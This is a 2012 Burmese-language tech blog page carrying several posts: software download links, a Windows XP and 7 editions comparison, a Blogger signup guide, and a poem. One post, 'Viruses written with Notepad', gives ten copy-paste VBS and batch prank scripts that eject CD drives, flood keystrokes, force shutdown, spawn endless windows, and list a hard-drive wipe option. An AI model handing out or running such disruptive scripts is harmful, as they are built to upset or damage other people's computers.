နည်းပညာဗဟုသုတ ပြည့်ဝကြပါစေ

Friday, March 23, 2012

Avira 2012 (Free Antivirus Software)


Avira Antivirus Software 2012 လေးပါ။ နိုင်ငံရပ်ခြားရောက်နေတဲ့ မိတ်ဆွေတွေအတွက် တင်ပေးလိုက်တာပါ။ မိုးရဲ့ website လေးက အများအတွက် အများကြီး အကျိုးမပြုရင်တောင် နည်းနည်းလေး အကျိုးပြုရင် မိုးကျေနပ်ပါတယ်။ ကဲ အောက်က download ကနေ download လုပ်နိုင်ပါပြီ။ အဆင်မပြေမှုရှိရင် Email ဖြင့် ပြန်လည် တောင်းဆိုနိုင်ပါတယ်။








Download

Rate this posting:
{[['']]}

Wednesday, March 21, 2012

OS အမျိုးအစားများ (for XP and 7)

မိုးတို့သုံးနေတဲ့ Operating System တွေကို အောက်ပါအတိုင်း အမျိုးအစားများခွဲထားပါတယ်။ ဒီpostကို တင်ရတဲ့ရည်ရွယ်ချက်ကတော့ မိမိcomputerနှင့်ကိုက်ညီမဲ့ Operting System အမျိုးအစားကို ရွေးချယ်တတ်ရန် ရည်ရွယ်ပြီး တင်လိုက်ရတာပါ။

Windows XP Editionများ
Window XP Editionများကို အောက်ပါအတိုင်း ခွဲခြားထားပါတယ်။
- Windows XP Starter
- Windows XP Home Edition
- Windows XP Professional Edition
- Windows XP Media Center Edition
- Windows XP Tablet Edition တွေဆိုပြီးရှိပါတယ်။

မှတ်ချက်။ ။ Prefessional နှင့် Home Edition ကတော့ အများသုံး OS တွေပါ။

Windows 7 Editionများ
Windows 7 အမျိုးအစား ၆မျိုးရှိပါတယ်။
- - Windows 7 Starter
- - Windows 7 Home Basic
- - Windows 7 Home Premium
- - Windows 7 Professional
- - Windows 7 Enterprise
- - Windows 7 Ultimate စတာတွေပဲ ဖြစ်ပါတယ်။

Windows 7 Starter
Windows 7 Starter ကို အသုံးပြုတာအရမ်းနည်းပါတယ်။ လက်လီအရောင်းတစ်ချို့နဲ့ ကွန်ပြူတာထုတ်လုပ်သူတစ်ချို့က ကွန်ပြူတာအသစ်ထဲမှာ တစ်ခါတည်းထည့်ပေးလိုက်တဲ့ အခါမျိုးတွေမှာ တွေ့ရတတ်ပါတယ်။ ဒီ version မှာ Aero user interface, DVD playback, Windows Media Center, Internet connection sharing တွေမရနိုင်ပါဘူး။ Domain system ကိုလဲ ဒီ version သုံးထားရင် join နိုင်မှာမဟုတ်ပါဘူး။ Enterprise Feature တွေဖြစ်တဲ့ … Encryption File System (EFS), AppLocker, DirectAccess, BitLocker, Remote Desktop Host, BranchCache စတာတွေလဲမရနိုင်ပါဘူး။ နောက် … အသုံးဝင်တဲ့ IIS Web Server ကိုလဲ သုံးလို့ရမှာ မဟုတ်ပါဘူး။ (Windows XP မှာလဲ IIS ပါပါတယ်။ များသောအားဖြင့်တော့ IIS သုံးချင်ရင် Windows Server versions တွေမှာပဲ သုံးတာများပါတယ်။ Windows 7 မှာလဲ IIS ကိုတစ်ခါတည်းထည့်ပေးထားပါတယ်။ Web Developer တွေအတွက်တော့ သိပ်အသုံးဝင်မှာပါ။ Windows 7 Professional, Enterprise, Ultimate versions တွေမှာ IIS ပါဝင်ပါတယ်။) Windows 7 Starter edition မှာ Physical Processor (CPU) တစ်လုံးပဲ တပ်လို့ရပါတယ်။ core ကတော့ unlimited ပါပဲ။ eg. Windows 7 version အားလုံးက dual core, quad core တို့ကို support လုပ်ပါတယ် …

Windows 7 Home Basic
Windows 7 Home Basic version တွေကို Emerging Market တွေလို့ဆိုတဲ့ ဖွံ.ဖြိုးစ နိုင်ငံတွေရဲ့ ဈေးကွက်မှာပဲတွေ့ရလေ့ ရှိပါတယ်။ ဒီ version မှာလဲ Aero user interface, DVD
playback, Windows Media Center, Internet connection sharing
တွေမရနိုင်ပါဘူး။
Domain system ကိုလဲ Home Basic version သုံးထားရင် join နိုင်မှာမဟုတ်ပါဘူး။ Enterprise Feature တွေဖြစ်တဲ့ … Encryption File System (EFS), AppLocker, DirectAccess,
BitLocker, Remote Desktop Host, BranchCache စတာတွေလဲမရနိုင်ပါဘူး။ IIS Web Server ကိုလဲ သုံးလို့ရမှာမဟုတ်ပါဘူး။
Windows 7 Home Basic edition မှာ Physical Processor (CPU) တစ်လုံးပဲ တပ်လို့ရပါတယ်။ 32bit version မှာ memory 4GB ထိ အများဆုံးသုံးနိုင်ပြီးတော့ … 64bit version မှာ memory 8GB ထိ အများဆုံးသုံးနိုင်ပါတယ်….

Windows 7 Home Premium
Windows 7 Starter ကို လက်လီအရောင်းတစ်ချို့နဲ့ ကွန်ပြူတာထုတ်လုပ်သူတစ်ချို့ကကွန်ပြူတာ အသစ်ထဲမှာ တစ်ခါတည်း ထည့်ပေးလိုက်တဲ့ အခါမျိုးတွေမှာ တွေ့ရတတ်ပါတယ်။ (မြန်မာနိုင်ငံမှာ computer ကို licensed windows နဲ့ရောင်းတဲ့အခါ Home Premium version တွေနဲ့ပဲ ရောင်းတာများပါတယ်)။ Windows 7 Starter & Home Basics တွေနဲ့ မတူတဲ့အချက်က … Home Premium edition မှာ .. Windows Aero UI, DVD playback, Windows Media Center, Internet connection sharing, IIS Webserver တွေပါလာတာပါပဲ။ ဒါပေမဲ့ Domain ကိုတော့ Join နိုင်မှာမဟုတ်ပါဘူး။ Enterprise Feature တွေဖြစ်တဲ့ Encryption File System (EFS), AppLocker, DirectAccess, BitLocker, Remote Desktop Host, BranchCache စတာတွေလဲမရနိုင်ပါဘူး။ 32bit version Windows 7 Home Premium က Memory 4GB ထိ အများဆုံး support လုပ်ပါတယ်။ 64bit version Windows 7 Home Premium က Memory 16GB ထိ အများဆုံး support လုပ်မှာဖြစ်ပါတယ်။ Windows 7 Home Premium က Physical Processors 2လုံးထိ support လုပ်ပေးနိုင်ပါတယ်။

Windows 7 Professional

Windows 7 Professional version မှာ Home Premium version မှာရတဲ့ Feature တွေအကုန်ရနိုင်ပါတယ်။ ဒါ့အပြင် Domain system ကိုလဲ join နိုင်မှာဖြစ်ပါတယ်။ EFS (Encryption File System), Remote Desktop Host စတာတွေလဲ ရပါတယ်။ သို့သော် … Enterprise
Feature တွေဖြစ်တဲ့ AppLocker, DirectAssess, BitLocker, BranchCache
စတာတွေ တော့ မရနိုင်ပါဘူး။
Windows 7 Professional က Physical Processors 2လုံးထိ support လုပ်ပေးနိုင်ပါတယ်။

Windows 7 Enterprise and Ultimate Editions

တကယ်တမ်းမှာတော့ ယေဘုံယျအားဖြင့် … Windows 7 Enterprise Edition နဲ့ Ultimate Edition ဟာအတူတူပါပဲ။ Windows 7 Ultimate Edition ကိုလက်လီအရောင်းတစ်ချို့ Computer ထုတ်လုပ်သူ တစ်ချို့က ကွန်ပြူတာအသစ်ထဲမှာ တစ်ခါတည်းထည့်ပေးလိုက်တဲ့ အခါမျိုးတွေမှာ ရရှိနိုင်ပါတယ်။ Windows 7 Enterprise Edition ကိုတော့ Microsoft’s volume licensing customer တွေအတွက်ပဲထုတ်ပေးပါတယ်။ Windows 7 Enterprise & Ultimate Editions တွေမှာ တခြား Windows 7 Editions တွေမှာရရှိနိုင်တဲ့ Feature တွေတင်မကပါဘူး … Enterprise Feature တွေဖြစ်တဲ့ … Encryption File System (EFS), AppLocker, DirectAccess, BitLocker,
Remote Desktop Host, BranchCache စတာတွေအပြင် Boot from VHD ကိုပါရနိုင်ပါတယ်။
Windows 7 Enterprise & Ultimate Editions တွေဟာ Physical Processors 2လုံးထိ support လုပ်ပေးနိုင်ပါတယ်။
Note : MCTS ( Windows 7, 70-680 ) ဖြေမဲ့သူတွေအတွက် … 70-680 မှာ test လုပ်တဲ့
feature အများစုဟာ Enterprise & Ultimate Editions တွေက features တွေဖြစ်ပါတယ်။


www.mandalaygazette.com မှ မှီငြမ်းပြီး တင်ပြထားတာပါ။

မိုး Rate this posting:
{[['']]}

Notepad နှင့်ရေးထားသော Virusများ


Virus လေးတွေကို စမ်းချင်တဲ့ သူတွေအတွက် မိုးတင်ထားပေးလိုက်ပါတယ်။ မိုး website ကို အဓိက ဗဟုသုတတွေကို ပဲတင်ချင်တာပါ။ connection ကသိပ်မကောင်းတော့ software တွေကို အများကြီး မတင်ပေးနိုင်ဘူးလေ။ ကဲ Virus အသေးစားလေးတွေစမ်းရေးကြရအောင်နော်။ သူများကိုတော့သွားမနှောက်ယှက်ကြနဲ့နော်။ သိထားရုံပဲကောင်းပါတယ်။ တော်ကြာ မိုးကြောင့်သူများ ဒုက္ခရောက်သွားအုံးမယ်။နောက်တာနော်။ ကဲ virus ရေးနည်း (10) မျိုးကို လေ့လာကြည့်ရအောင်နော်။
(1) နှောက်ယှက်ပုံ (သင့် CD Drive ကိုဆက်တိုက်ဖွင့်နေပါလိမ့်မယ်။ ဖွင့်လိုက်ပိတ်လိုက်ပေါ့။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.vbs) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


(2) နှောက်ယှက်ပုံ (Caps Lock ကိုဆက်တိုက်ဖွင့်လိုက်ပိတ်လိုက်လုပ်နေပါလိမ့်မယ်။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.vbs) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop



(3) နှောက်ယှက်ပုံ (ဒါလေးကသင့်ကွန်ပြူတာကို message ပေးပြီး shutdown ကျသွားစေပါတယ်။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.bat) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


(4) နှောက်ယှက်ပုံ (Enter key ကိုဆက်တိုက်နှိပ်နေမှာပါ။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.vbs) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


(5) နှောက်ယှက်ပုံ (CMD နဲ့Notepad တွေရပ်မရအောင်ဆက်တိုက်ဖွင့်တာလေးပါ။ ဒါလေးကနဲနဲလေး ဆိုးတယ်နော်။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.bat) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

@echo off
:A
start cmd
start notepad
goto :A



(6) နှောက်ယှက်ပုံ (Backspace တိုက်ပွင့်နေမှာပါ။သင်စာရိုက်လို့မရအောင် နှောက်ယှက်နေမှာပါ။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.vbs) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


(7) နှောက်ယှက်ပုံ (သင့် keyboard လေးကိုဟက်ပြီး သင်ဟာအရူးဆိုပြီးသင်စာရိုက်တိုင်းပေါ်နေမှာပါ။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.vbs) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


(8) နှောက်ယှက်ပုံ (Notepad ကိုဆက်တိုက်ပွင့်နေမှာပါ။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.bat) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top


(9) နှောက်ယှက်ပုံ (ေအာက်ကဖြစ်စဉ်တွေကိုလုပ်ပေးမယ့် program လေးပါ။ပေးလာမယ့် မက်ဆေ့တွေကကျွန်တော်ထင် သလိုရှောက်ရေးထားတာပါ။)
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.bat) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
code:

@echo off
title The end of the world
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two



(10) Lighting .bat

သင့် မော်နီတာဟာဘာမှ မမြင်ရပဲ လင်းလက်နေတဲ့ ဖန်သားပြင်ကိုသာမြင်ရမှာပါ။
ဒီ Code လေးကို copy ကူးလိုက်ပါ။ ပြီးရင် Window ထဲက Notepad လေးထဲမှာ (file name.bat) ဖြင့် Save လုပ်လိုက်ပါ။ file name နေရာတွင် နှစ်သက်ရာ နာမည်ကိုပေးနိုင်သည်။

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug nul
del z.dbg

သင်ပြန်ထွက်ချင်ရင် CTRL-ALT-DELETE နဲ့ပြန်ထွက်လိုက်ပါ။
အောက်ကကုတ်ဆိုရင် အဲဒါနဲ့မရပါ။ Ctrl+Shirt+Esc နဲ့ရမယ်။
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug nul
del z.dbg
goto a

ကဲအပျော်တမ်း virus လေးတွေရေးပြီး ပျော်ရွှင်နိုင်ပါစေ။

မိုး
Rate this posting:
{[['']]}

Adobe Premier 6.5


ဒီ Software လေးကတော့ Video Editing လုပ်မယ့်သူ တွေအတွက်ပါ။ မိုးမိတ်ဆွေတစ်ယောက်က တောင်းဆိုလို့ Connection လဲကောင်းလို့ တင်ပေးလိုက်ပါတယ်။ Download ကိုနှိပ်ပြီး download လုပ်နိုင်ပါတယ်။ အားလုံး အဆင်ပြေကြပါစေ။






Download Rate this posting:
{[['']]}

Wednesday, March 14, 2012

Start Blog

မိုးရဲ့ Blog လေးကို Blogger ရေစီးကြောင်းထဲ မြောမသွားချင်လို့၊ Professional site တစ်ခုဖြစ်အောင် Hardware ပိုင်းနဲ့ Blog ပိုင်းလေးကို မိုးရွေးချယ်လိုက်ရပါတယ်။ ဒီ post လေးကတော့ Blog အတွက် ပထမဆုံး သော Post လေးပါ။ Blogger ဖြစ်ချင်သူတွေအတွက် ရည်စူးပြီး တင်ပေးလိုက်ရပါတယ်။

Blog တစ်ခုကို အကောင်းဆုံးရေးဖို့အတွက် Google က ပေးထားတဲ့ www.blogger.com လေးကို မိုးရွေးချယ်လိုက်ပါတယ်။ ဘာကြောင့်ရွေးချယ်ရလဲဆိုရင် သုံးရတာ လွယ်ကူတယ်၊ domain name ပြောင်းရလွယ်ကူတယ်။ ဒါကြောင့်မိုးအကြိုက်ဆုံးကိုရွေးချယ်လိုက်ရပါတယ်။

Sign in ပုံ(၁)
Blog ရေးဖို့ www.blogger.com ကိုရိုက်ပြီးဝင်လိုက်ပါ။ ပြီးရင် Get Started ကိုနှိပ်ပါ။













ပုံ (၁)














ပုံ (၂)
Form လေးဖြည့်ရအောင်နော် ပုံ (၂)
Email Address .......................... (Email လိပ်စာ)
Retype Email Address .................................. ( Email လိပ်စာကို နောက်တစ်ခေါက်ထပ်ရေးပါ)
Enter a password ............................... (Email password ကို ရိုက်ထည့်ပေးရပါမယ်)
Retype password ............................... (Password ကို နောက်တစ်ခေါက်ထပ်ရိုက်ပါ)
Display name .................................. ( Website ပေါ်မယ့်နာမည်လေးပါ၊ နှစ်သက်ရာပေးနိုင်ပါတယ်)
Email notification လေးကို အမှန်ခြစ်ပေးခဲ့ပါ။
Gender .................................... ( Male or Female ရွေးပေးပါ)
Birthday .................................. (မွေးနေ့ကို ရိုက်ပေးပါ)
Word Verification ............................ (ဒါကတော့ သူပေးထားတဲ့ စကားလုံးလေးကို သေချာမှန်ကုန်စွာရိုက်ပါ)
Acceptance of Terms ကို အမှန်ခြစ်ပေးခဲ့ပါ။
Continue ကိုနှိပ်ပါ။

Title and Address ပုံ(၃)

1. ဒါကတော့ မိမိရေးမယ့် Blog ရဲ့ Title လေးပါ။ ဒါကအရေးကြီးတယ်နော်။ ကိုယ်ဘာအကြောင်းအရာရေးမယ်ဆိုတာကို သေချာရွေးချယ်သင့်တယ်။ မိုးကတော့ နည်းပညာအကြောင်းရေးမှာမို့ PC Knowledge လို့ပဲပေးလိုက်ပါတယ်။
2. ဒါလဲအရေးကြီးတယ်နော်။ ကိုယ့်ရဲ့ Blog လိပ်စာလေးပါ။ လိပ်စာကို အများမှတ်မိလွယ်တဲ့ နာမည်ကို ရွေးချယ်ပေးပါ။ စာလုံးပေါင်းလွယ်ကူရာကို ရွေးချယ်ပေးပါ။
၃. ဒါကတော့ သူပေးထားတဲ့စကားလုံးတွေကို မှန်ကန်အောင်ရိုက်ပေးပါ။

















ပုံ (၃)

ကဲ ခုတော့ Blog တစ်ခုကိုစရေးဖို့ အဆင်သင့်ဖြစ်နေပါပြီ။ ဆက်လက်ပြီး လေ့လာပေးပါရန်....................

လေးစားစွာဖြင့်
မိုး Rate this posting:
{[['']]}

Monday, March 12, 2012

Browser တွင် password auto ပေါ်နေလျှင် ဖြေရှင်းနည်း


မိုးရဲ့ မိတ်ဆွေတစ်ယောက်က facebook password auto ပေါ်နေလို့ ဘယ်လိုဖြေရှင်းရမလဲဆိုလို့ အခြားသော မိတ်ဆွေများအတွက်ပါ တစ်ခါတည်း မိုးတင်ပေးလိုက်ပါတယ်။ email password, facebook password, ... password တွေ auto မပေးထားပဲ ပေါ်နေရင် Browser မှာ Temporary file, Cookeis တွေများနေလို့ပါ။ အကောင်းဆုံး နည်းလမ်းကတော့ CC Cleaner နဲ့ရှင်းပြီး ပြန်ဖွင့်လိုက်ပါ။ အောက်မှာ CC Cleaner ကို တင်ပေးလိုက်ပါတယ်။


download Rate this posting:
{[['']]}

Sunday, March 11, 2012

HTML အခြေခံစာအုပ်

Link
Website ရေးမယ်လို့ ဆုံးဖြတ်ထားရင် အနည်းဆုံး Language (၃)ခုကို တော့ တတ်ထားသင့်ပါတယ်။

(1) HTML
(2) CSS
(3) Java Script

ဒီစာအုပ်လေးကတော့ HTML ကို အခြေခံမှစပြီး လေ့လာဖို့ အတွက် တင်ပေးလိုက်ပါတယ်။
အောက်က download လေးကိုနှိပ်ပြီး download လုပ်လိုက်ပါနော်။


download Rate this posting:
{[['']]}

Saturday, March 10, 2012

ဘယ်ခါဆယ်၍ရမလဲ

• ငါ သာလျှင် တော် ၊ သူ မတော် ဟု
လူတော် ထင်ပါ ၊ တို့မြန်မာကို
ဘယ်ခါ ဆယ်၍ ရမလဲ ၊၊

• ကြွားရင်းနှင့် နစ် ၊
ဝါးရင်း နစ်သည့်နစ်လျက်နေပါ ၊ တို့မြန်မာကို
ဘယ်ခါ ဆယ်၍ ရ မလဲ ၊၊

• အကောင်း ဆိုးထင် ၊ ဆိုး ကောင်းထင် နှင့်
အထင်လွဲပါ ၊ တို့မြန်မာကို
ဘယ်ခါဆယ်၍ ရမလဲ ၊၊

• သူ့ကို ငါညှိုး ၊ ငါ့ သူညှိုးနှင့်
အညှိုးကြီးပါ ၊ တို့မြန်မာကို
ဘယ်ခါ ဆယ်၍ ရမလဲ ၊၊

• ညည်း၍ မပြီး ၊ ညူ မပြီးဘူး
အပြီးတကာ ၊ လုပ်နိုင်ပါမှ
တော်ရာရောက်လိမ့် နောင်အဖို့ ၊၊
နိုးကြ ထကြ မြန်မာတို့ ၊၊
သားမြေးတို့တွက် ကြိုးစားစို့ ၊၊ ၊။

ရေး - မင်းသုဝဏ်
Rate this posting:
{[['']]}

Twitter Facebook More